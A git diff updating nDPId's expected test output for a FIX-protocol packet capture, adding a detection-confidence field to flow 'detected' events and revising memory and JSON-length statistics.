 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 5441/5441
@@ -50,10 +50,10 @@
 ~~ total active/idle flows...: 6/6
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4771074 bytes
-~~ total memory freed........: 4771074 bytes
-~~ total allocations/frees...: 105027/105027
+~~ total memory allocated....: 4854387 bytes
+~~ total memory freed........: 4854387 bytes
+~~ total allocations/frees...: 106617/106617
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
-~~ json string max len.......: 888 chars
-~~ json string avg len.......: 595 chars
+~~ json string max len.......: 914 chars
+~~ json string avg len.......: 608 chars
diff --git a/test/results/fix.pcap.out b/test/results/fix.pcap.out
index 1d27aabee..c8725692b 100644
--- a/test/results/fix.pcap.out
+++ b/test/results/fix.pcap.out
@@ -1,76 +1,76 @@
 00435{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="}
-00588{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"}
-00588{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
-00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="}
-00588{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="}
-00592{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
-00589{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"}
 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="}
-00592{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"}
-00589{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
